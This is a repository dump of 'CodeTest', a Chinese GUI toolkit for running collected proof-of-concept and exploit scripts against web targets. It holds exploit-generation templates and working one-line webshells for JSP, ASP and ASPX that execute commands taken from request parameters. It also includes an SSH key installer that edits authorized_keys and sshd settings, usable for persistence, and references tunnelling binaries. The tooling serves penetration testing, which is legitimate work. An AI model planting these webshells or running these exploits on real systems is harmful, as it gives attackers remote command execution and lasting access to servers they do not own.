30 | from urlparse import urlparse
31 |
32 | if PY3:
33 | from imp import reload as reload_six
34 | else:
35 | reload_six = reload
36 |
37 | if PY3:
38 | from queue import Empty, Queue
39 | else:
40 | from Queue import Empty, Queue
41 |
42 |
43 | def withMetaclass(meta, *bases):
44 | """Create a base class with a metaclass."""
45 |
46 | # This requires a bit of explanation: the basic idea is to make a dummy
47 | # metaclass for one level of class instantiation that replaces itself with
48 | # the actual metaclass.
49 | class MetaClass(meta):
50 |
51 | def __new__(cls, name, this_bases, d):
52 | return meta(name, bases, d)
53 |
54 | return type.__new__(MetaClass, 'temporary_class', (), {})
55 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Welcome to CodeTest
2 |
3 | ### :point_right:关于本项目
4 |
5 | >本项目的主要目的: 针对日常收集的Python POC\EXP测试脚本,使用可视化界面统一执行入口,方便运行。
6 | >
7 | >本项目适合人群: 有Python基础的渗透测试人员(工具自带简易编辑器,可修改脚本内参数,重新加载后可灵活使用脚本进行测试)
8 | >
9 | >可视化界面开发库: Tkinter
10 | >
11 | >python版本: 3.5+
12 |
13 | ### :bulb:POC\EXP 参考链接
14 |
15 | ```
16 | https://github.com/Ascotbe/Medusa
17 | https://github.com/zhzyker/vulmap
18 | https://github.com/Python3WebSpider/ProxyPool
19 | ```
20 |
21 |
22 | ### :book:使用说明
23 |
24 | ```
25 | (一)下载文件
26 | git clone https://github.com/codeyso/CodeTest.git
27 | cd CodeTest
28 |
29 | (二)安装依赖
30 | pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
31 | 注意: ~\Python3\Lib\site-packages,找到这个路径,下面有一个文件夹叫做crypto,将小写c改成大写C
32 | 注意: 建议安装之前更新pip (python -m pip install --upgrade pip)
33 |
34 | (三)使用工具
35 | 1) 双击 CodeTest.bat
36 | 2) pythonw3 -B CodeTest.pyw
37 |
38 | (四)备注: 如果GitHub图片显示不出来,修改hosts
39 | C:\Windows\System32\drivers\etc\hosts
40 |
41 | 在文件末尾添加
42 | # GitHub Start
43 | 192.30.253.112 Build software better, together
44 | 192.30.253.119 gist.github.com
45 | 151.101.184.133 assets-cdn.github.com
46 | 151.101.184.133 raw.githubusercontent.com
47 | 151.101.184.133 gist.githubusercontent.com
48 | 151.101.184.133 cloud.githubusercontent.com
49 | 151.101.184.133 camo.githubusercontent.com
50 | 151.101.184.133 avatars0.githubusercontent.com
51 | 151.101.184.133 avatars1.githubusercontent.com
52 | 151.101.184.133 avatars2.githubusercontent.com
53 | 151.101.184.133 avatars3.githubusercontent.com
54 | 151.101.184.133 avatars4.githubusercontent.com
55 | 151.101.184.133 avatars5.githubusercontent.com
56 | 151.101.184.133 avatars6.githubusercontent.com
57 | 151.101.184.133 avatars7.githubusercontent.com
58 | 151.101.184.133 avatars8.githubusercontent.com
59 |
60 | # GitHub End
61 | ```
62 |
63 |
64 | ### :checkered_flag:模板
65 | #### POC
66 |
67 | ```
68 | def check(**kwargs):
69 | url = kwargs['url']#/*str*/
70 | print('输出结果')
71 | print(url)
72 | '''此处的返回状态码用于批量验证
73 | if True:
74 | return 1
75 | else:
76 | return
77 | '''
78 | ```
79 |
80 |
81 | #### EXP
82 |
83 | ```
84 | 有专用的EXP生成界面
85 | ```
86 |
87 |
88 | ### :clipboard:功能界面
89 | #### 漏洞扫描界面
90 | 
91 |
92 | #### 漏洞利用界面
93 | 
94 |
95 | ### :open_file_folder:使用示例
96 | >案例参考:https://mp.weixin.qq.com/s/xwh81ZeE0Lgx-iIpqZI1_g
97 |
98 |
--------------------------------------------------------------------------------
/Template/EXP.j2:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import prettytable as pt
4 | """
5 | import util.globalvar as GlobalVar
6 | from ClassCongregation import ysoserial_payload,Dnslog
7 | DL = Dnslog()
8 | DL.dns_host()
9 | DL.result()
10 | """
11 | class {{service.entry_nodes.vulname}}():
12 | def __init__(self, **env):
13 | """
14 | 基础参数初始化
15 | """
16 | self.url = env.get('url')
17 | self.cookie = env.get('cookie')
18 | self.cmd = env.get('cmd')
19 | self.pocname = env.get('pocname')
20 | self.vuln = env.get('vuln')
21 | self.timeout = int(env.get('timeout'))
22 | self.retry_time = int(env.get('retry_time'))
23 | self.retry_interval = int(env.get('retry_interval'))
24 | self.status = env.get('status')
25 |
26 | def {{service.entry_nodes.cvename}}(self):
27 | appName = '{{service.entry_nodes.vulname}}'
28 | pocname = '{{service.entry_nodes.cvename}}'
29 | path = '{{service.header_nodes.headinfo.path}}'
30 | method = '{{service.header_nodes.headinfo.method}}'
31 | desc = '{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}'
32 | data = '{{service.header_nodes.content.data}}'
33 | headers = {{service.header_nodes.headinfo.header}}
34 | #输出类
35 | output = Output(pocname)
36 | #请求类
37 | exprequest = ExpRequest(pocname, output)
38 | try:
39 | if self.vuln == 'False':
40 | r = exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
41 | {{service.entry_nodes.condition}}
42 | self.status = 'success'
43 | output.no_echo_success(method, desc)
44 | else:
45 | output.fail()
46 | else:
47 | result = exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
48 | print(result)
49 | except Exception as error:
50 | output.error_output(str(error))
51 |
52 | tb = pt.PrettyTable()
53 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
54 | tb.align['Target type'] = 'l'
55 | tb.align['Vuln Name'] = 'l'
56 | tb.align['Impact Version && Vulnerability description'] = 'l'
57 | tb.add_row([
58 | "{{service.entry_nodes.vulname}}",
59 | "{{service.entry_nodes.cvename}}",
60 | "{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}"
61 | ])
62 | print(tb)
63 |
64 | def check(**kwargs):
65 | result_list = []
66 | result_list.append('----------------------------')
67 | Exp{{service.entry_nodes.vulname}} = {{service.entry_nodes.vulname}}(**kwargs)
68 | if kwargs['pocname'] != 'ALL':
69 | func = getattr(Exp{{service.entry_nodes.vulname}}, kwargs['pocname'])#返回对象函数属性值,可以直接调用
70 | func()#调用函数
71 | return Exp{{service.entry_nodes.vulname}}.status
72 | else:#调用所有函数
73 | for func in dir({{service.entry_nodes.vulname}}):
74 | if not func.startswith("__"):
75 | methodcaller(func)(Exp{{service.entry_nodes.vulname}})
76 | result_list.append(func+' -> '+Exp{{service.entry_nodes.vulname}}.status)
77 | Exp{{service.entry_nodes.vulname}}.status = 'fail'
78 | result_list.append('----------------------------')
79 | return '\n'.join(result_list)
--------------------------------------------------------------------------------
/Template/POC.j2:
--------------------------------------------------------------------------------
1 | from ClassCongregation import color
2 |
3 | def check(**kwargs):
4 | url = kwargs['url']#/*str*/
5 | print('输出结果')
6 | print(url)
7 | '''
8 | if True:
9 | return 1
10 | else:
11 | return
12 | '''
--------------------------------------------------------------------------------
/Template/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Template/__init__.py
--------------------------------------------------------------------------------
/data/api-docs.json:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/data/api-docs.json
--------------------------------------------------------------------------------
/data/bool_blind.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 | >
24 |
--------------------------------------------------------------------------------
/data/error.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
--------------------------------------------------------------------------------
/data/time_blind.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | >
13 |
--------------------------------------------------------------------------------
/execScripts/Caidao_cmd.jsp:
--------------------------------------------------------------------------------
1 | <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
--------------------------------------------------------------------------------
/execScripts/Caidao_shell.asp:
--------------------------------------------------------------------------------
1 | <%execute(request("value"))%>
--------------------------------------------------------------------------------
/execScripts/Caidao_shell.aspx:
--------------------------------------------------------------------------------
1 | <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>
--------------------------------------------------------------------------------
/execScripts/Caidao_shell.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/img/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/1.png
--------------------------------------------------------------------------------
/img/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/2.png
--------------------------------------------------------------------------------
/lib/green.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/green.png
--------------------------------------------------------------------------------
/lib/note.txt:
--------------------------------------------------------------------------------
1 | #此处存放临时数据
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 |
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 |
484 |
485 |
486 |
487 |
488 |
489 |
490 |
491 |
492 |
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 |
632 |
633 |
634 |
635 |
636 |
637 |
638 |
639 |
640 |
641 |
642 |
643 |
644 |
645 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
654 |
655 |
656 |
657 |
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 |
674 |
675 |
676 |
677 |
678 |
679 |
680 |
681 |
682 |
683 |
684 |
685 |
686 |
687 |
688 |
689 |
690 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 |
700 |
701 |
702 |
703 |
704 |
705 |
706 |
707 |
708 |
709 |
710 |
711 |
712 |
713 |
714 |
715 |
716 |
717 |
718 |
719 |
720 |
721 |
722 |
723 |
724 |
725 |
726 |
727 |
728 |
729 |
730 |
731 |
732 |
733 |
734 |
735 |
736 |
737 |
738 |
739 |
740 |
741 |
742 |
743 |
744 |
745 |
746 |
747 |
748 |
749 |
750 |
751 |
752 |
753 |
754 |
755 |
756 |
757 |
758 |
759 |
760 |
761 |
762 |
763 |
764 |
765 |
766 |
767 |
768 |
769 |
770 |
771 |
772 |
773 |
774 |
775 |
776 |
777 |
778 |
779 |
780 |
781 |
782 |
783 |
784 |
785 |
786 |
787 |
788 |
789 |
790 |
791 |
792 |
793 |
794 |
795 |
796 |
797 |
798 |
799 |
800 |
801 |
802 |
803 |
804 |
805 |
806 |
807 |
808 |
809 |
810 |
811 |
812 |
813 |
814 |
815 |
816 |
817 |
818 |
819 |
820 |
821 |
822 |
823 |
824 |
825 |
826 |
827 |
828 |
829 |
830 |
831 |
832 |
833 |
834 |
835 |
836 |
837 |
838 |
839 |
840 |
841 |
842 |
843 |
844 |
845 |
846 |
847 |
848 |
849 |
850 |
851 |
852 |
853 |
854 |
855 |
856 |
857 |
858 |
859 |
860 |
861 |
862 |
863 |
864 |
865 |
866 |
867 |
868 |
869 |
870 |
871 |
872 |
873 |
874 |
875 |
876 |
877 |
878 |
879 |
880 |
881 |
882 |
883 |
884 |
885 |
886 |
887 |
888 |
889 |
890 |
891 |
892 |
893 |
894 |
895 |
896 |
897 |
898 |
899 |
900 |
901 |
902 |
903 |
904 |
905 |
906 |
907 |
908 |
909 |
910 |
911 |
912 |
913 |
914 |
915 |
916 |
917 |
918 |
919 |
920 |
921 |
922 |
923 |
924 |
925 |
926 |
927 |
928 |
929 |
930 |
931 |
932 |
933 |
934 |
935 |
936 |
937 |
938 |
939 |
940 |
941 |
942 |
943 |
944 |
945 |
946 |
947 |
948 |
949 |
950 |
951 |
952 |
953 |
954 |
955 |
956 |
957 |
958 |
959 |
960 |
961 |
962 |
963 |
964 |
965 |
--------------------------------------------------------------------------------
/lib/red.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/red.png
--------------------------------------------------------------------------------
/log/info.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/log/info.txt
--------------------------------------------------------------------------------
/payload_html/Ueditor/Ueditor.html:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/payload_html/Ueditor/ueditor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/Ueditor/ueditor.png
--------------------------------------------------------------------------------
/payload_html/chrome_payload.html:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/payload_html/key.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | #=============================================================
3 | # https://github.com/P3TERX/SSH_Key_Installer
4 | # Description: Install SSH keys via GitHub, URL or local files
5 | # Version: 2.7
6 | # Author: P3TERX
7 | # Blog: https://p3terx.com
8 | #=============================================================
9 |
10 | VERSION=2.7
11 | RED_FONT_PREFIX="\033[31m"
12 | LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
13 | FONT_COLOR_SUFFIX="\033[0m"
14 | INFO="[${LIGHT_GREEN_FONT_PREFIX}INFO${FONT_COLOR_SUFFIX}]"
15 | ERROR="[${RED_FONT_PREFIX}ERROR${FONT_COLOR_SUFFIX}]"
16 | [ $EUID != 0 ] && SUDO=sudo
17 |
18 | USAGE() {
19 | echo "
20 | SSH Key Installer $VERSION
21 |
22 | Usage:
23 | bash <(curl -fsSL git.io/key.sh) [options...]
24 |
25 | Options:
26 | -o Overwrite mode, this option is valid at the top
27 | -g Get the public key from GitHub, the arguments is the GitHub ID
28 | -u Get the public key from the URL, the arguments is the URL
29 | -f Get the public key from the local file, the arguments is the local file path
30 | -p Change SSH port, the arguments is port number
31 | -d Disable password login"
32 | }
33 |
34 | if [ $# -eq 0 ]; then
35 | USAGE
36 | exit 1
37 | fi
38 |
39 | get_github_key() {
40 | if [ "${KEY_ID}" == '' ]; then
41 | read -e -p "Please enter the GitHub account:" KEY_ID
42 | [ "${KEY_ID}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1
43 | fi
44 | echo -e "${INFO} The GitHub account is: ${KEY_ID}"
45 | echo -e "${INFO} Get key from GitHub..."
46 | PUB_KEY=$(curl -fsSL https://github.com/${KEY_ID}.keys)
47 | if [ "${PUB_KEY}" == 'Not Found' ]; then
48 | echo -e "${ERROR} GitHub account not found."
49 | exit 1
50 | elif [ "${PUB_KEY}" == '' ]; then
51 | echo -e "${ERROR} This account ssh key does not exist."
52 | exit 1
53 | fi
54 | }
55 |
56 | get_url_key() {
57 | if [ "${KEY_URL}" == '' ]; then
58 | read -e -p "Please enter the URL:" KEY_URL
59 | [ "${KEY_URL}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1
60 | fi
61 | echo -e "${INFO} Get key from URL..."
62 | PUB_KEY=$(curl -fsSL ${KEY_URL})
63 | }
64 |
65 | get_loacl_key() {
66 | if [ "${KEY_PATH}" == '' ]; then
67 | read -e -p "Please enter the path:" KEY_PATH
68 | [ "${KEY_PATH}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1
69 | fi
70 | echo -e "${INFO} Get key from $(${KEY_PATH})..."
71 | PUB_KEY=$(cat ${KEY_PATH})
72 | }
73 |
74 | install_key() {
75 | [ "${PUB_KEY}" == '' ] && echo "${ERROR} ssh key does not exist." && exit 1
76 | if [ ! -f "${HOME}/.ssh/authorized_keys" ]; then
77 | echo -e "${INFO} '${HOME}/.ssh/authorized_keys' is missing..."
78 | echo -e "${INFO} Creating ${HOME}/.ssh/authorized_keys..."
79 | mkdir -p ${HOME}/.ssh/
80 | touch ${HOME}/.ssh/authorized_keys
81 | if [ ! -f "${HOME}/.ssh/authorized_keys" ]; then
82 | echo -e "${ERROR} Failed to create SSH key file."
83 | else
84 | echo -e "${INFO} Key file created, proceeding..."
85 | fi
86 | fi
87 | if [ "${OVERWRITE}" == 1 ]; then
88 | echo -e "${INFO} Overwriting SSH key..."
89 | echo -e "${PUB_KEY}\n" >${HOME}/.ssh/authorized_keys
90 | else
91 | echo -e "${INFO} Adding SSH key..."
92 | echo -e "\n${PUB_KEY}\n" >>${HOME}/.ssh/authorized_keys
93 | fi
94 | chmod 700 ${HOME}/.ssh/
95 | chmod 600 ${HOME}/.ssh/authorized_keys
96 | [[ $(grep "${PUB_KEY}" "${HOME}/.ssh/authorized_keys") ]] &&
97 | echo -e "${INFO} SSH Key installed successfully!" || {
98 | echo -e "${ERROR} SSH key installation failed!"
99 | exit 1
100 | }
101 | }
102 |
103 | change_port() {
104 | echo -e "${INFO} Changing SSH port to ${SSH_PORT} ..."
105 | if [ $(uname -o) == Android ]; then
106 | [[ -z $(grep "Port " "$PREFIX/etc/ssh/sshd_config") ]] &&
107 | echo -e "${INFO} Port ${SSH_PORT}" >>$PREFIX/etc/ssh/sshd_config ||
108 | sed -i "s@.*\(Port \).*@\1${SSH_PORT}@" $PREFIX/etc/ssh/sshd_config
109 | [[ $(grep "Port " "$PREFIX/etc/ssh/sshd_config") ]] && {
110 | echo -e "${INFO} SSH port changed successfully!"
111 | RESTART_SSHD=2
112 | } || {
113 | RESTART_SSHD=0
114 | echo -e "${ERROR} SSH port change failed!"
115 | exit 1
116 | }
117 | else
118 | $SUDO sed -i "s@.*\(Port \).*@\1${SSH_PORT}@" /etc/ssh/sshd_config && {
119 | echo -e "${INFO} SSH port changed successfully!"
120 | RESTART_SSHD=1
121 | } || {
122 | RESTART_SSHD=0
123 | echo -e "${ERROR} SSH port change failed!"
124 | exit 1
125 | }
126 | fi
127 | }
128 |
129 | disable_password() {
130 | if [ $(uname -o) == Android ]; then
131 | sed -i "s@.*\(PasswordAuthentication \).*@\1no@" $PREFIX/etc/ssh/sshd_config && {
132 | RESTART_SSHD=2
133 | echo -e "${INFO} Disabled password login in SSH."
134 | } || {
135 | RESTART_SSHD=0
136 | echo -e "${ERROR} Disable password login failed!"
137 | exit 1
138 | }
139 | else
140 | $SUDO sed -i "s@.*\(PasswordAuthentication \).*@\1no@" /etc/ssh/sshd_config && {
141 | RESTART_SSHD=1
142 | echo -e "${INFO} Disabled password login in SSH."
143 | } || {
144 | RESTART_SSHD=0
145 | echo -e "${ERROR} Disable password login failed!"
146 | exit 1
147 | }
148 | fi
149 | }
150 |
151 | while getopts "og:u:f:p:d" OPT; do
152 | case $OPT in
153 | o)
154 | OVERWRITE=1
155 | ;;
156 | g)
157 | KEY_ID=$OPTARG
158 | get_github_key
159 | install_key
160 | ;;
161 | u)
162 | KEY_URL=$OPTARG
163 | get_url_key
164 | install_key
165 | ;;
166 | f)
167 | KEY_PATH=$OPTARG
168 | get_loacl_key
169 | install_key
170 | ;;
171 | p)
172 | SSH_PORT=$OPTARG
173 | change_port
174 | ;;
175 | d)
176 | disable_password
177 | ;;
178 | ?)
179 | USAGE
180 | exit 1
181 | ;;
182 | :)
183 | USAGE
184 | exit 1
185 | ;;
186 | *)
187 | USAGE
188 | exit 1
189 | ;;
190 | esac
191 | done
192 |
193 | if [ "$RESTART_SSHD" = 1 ]; then
194 | echo -e "${INFO} Restarting sshd..."
195 | $SUDO systemctl restart sshd && echo -e "${INFO} Done."
196 | elif [ "$RESTART_SSHD" = 2 ]; then
197 | echo -e "${INFO} Restart sshd or Termux App to take effect."
198 | fi
199 |
--------------------------------------------------------------------------------
/payload_html/kindeditor.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Uploader
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
--------------------------------------------------------------------------------
/payload_html/npc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc
--------------------------------------------------------------------------------
/payload_html/npc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc.exe
--------------------------------------------------------------------------------
/payload_html/nps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/nps
--------------------------------------------------------------------------------
/payload_html/wget.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/wget.exe
--------------------------------------------------------------------------------
/python.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/python.ico
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests==2.26.0
2 | pysocks==1.7.1
3 | prettytable==2.4.0
4 | exp10it==2.7.81
5 | Crypto==1.4.1
6 | click==8.0.1
7 | pycryptodome==3.10.1
8 | jinja2==3.0.3
9 | requests_toolbelt==0.9.1
10 | openpyxl==3.0.9
11 | ajpy==0.0.5
--------------------------------------------------------------------------------
/settings.py:
--------------------------------------------------------------------------------
1 | from tkinter import StringVar,IntVar
2 | import os
3 | import sys
4 |
5 | ###获取项目路径###
6 | curPath = os.path.dirname(os.path.realpath(sys.executable))#当前执行路径
7 | scriptPath = os.getcwd()
8 |
9 | #代理网站
10 | Proxy_page = IntVar(value=1)#爬取代理的页数
11 | Proxy_webtitle = StringVar(value='米扑代理')#爬取代理的页数
12 | Proxy_web = {
13 | '米扑代理' : 'freeProxy01',
14 | '66代理' : 'freeProxy02',
15 | 'pzzqz' : 'freeProxy03',
16 | '神鸡代理' : 'freeProxy04',
17 | '快代理' : 'freeProxy05',
18 | '极速代理' : 'freeProxy06',
19 | '云代理' : 'freeProxy07',
20 | '小幻代理' : 'freeProxy08',
21 | '免费代理库' : 'freeProxy09',
22 | '89免费代理' : 'freeProxy13',
23 | '西拉代理' : 'freeProxy14',
24 | }
25 |
26 | #代理界面_Proxy
27 | Proxy_type = StringVar(value='HTTP/HTTPS')#代理界面_代理类型_HTTP
28 | Proxy_CheckVar1 = IntVar()#代理界面_控制代理开关1
29 | Proxy_CheckVar2 = IntVar()#代理界面_控制代理开关0
30 | Proxy_addr = StringVar(value='127.0.0.1')#代理界面_代理IP
31 | Proxy_port = StringVar(value='8080')#代理界面_代理端口
32 |
33 | #漏洞扫描界面_A
34 | Ent_A_Top_thread = StringVar(value='3')#漏洞扫描界面_顶部_线程_3
35 | Ent_A_Top_Text = '''[*]请输入正确的网址,比如 [http://www.baidu.com]
36 | [*]请注意有些需要使用域名, 有些需要使用IP!
37 | [*]漏洞扫描模块是检测漏洞的, 命令执行需要在漏洞利用模块使用!
38 | [-]有处BUG, 在读取py文件时, 如果引号前面有字母存在会出错, 如 f'', r''
39 | '''
40 |
41 | #漏洞利用界面_B
42 | Ent_B_Top_url = StringVar(value='')#漏洞利用界面_顶部_目标地址
43 | Ent_B_Top_cookie = StringVar(value='暂时无用')#漏洞利用界面_顶部_Cookie
44 | Ent_B_Top_vulname = StringVar(value='请选择漏洞名称')#漏洞利用界面_顶部_漏洞名称_请选择漏洞名称
45 | Ent_B_Top_vulmethod = StringVar(value='ALL')#漏洞利用界面_顶部_调用方法_ALL
46 | Ent_B_Top_funtype = StringVar(value='False')#漏洞利用界面_顶部_exp功能_False
47 | Ent_B_Top_timeout = StringVar(value='5')#漏洞扫描界面_顶部_超时时间_3
48 | Ent_B_Top_retry_time = StringVar(value='1')#漏洞扫描界面_顶部_重试次数_2
49 | Ent_B_Top_retry_interval = StringVar(value='1')#漏洞扫描界面_顶部_重试间隔_2
50 | Ent_B_Bottom_Left_cmd = StringVar()#漏洞利用界面_底部_CMD命令输入框
51 | Ent_B_Bottom_terminal_cmd = StringVar()#漏洞利用界面_终端_CMD命令输入框
52 |
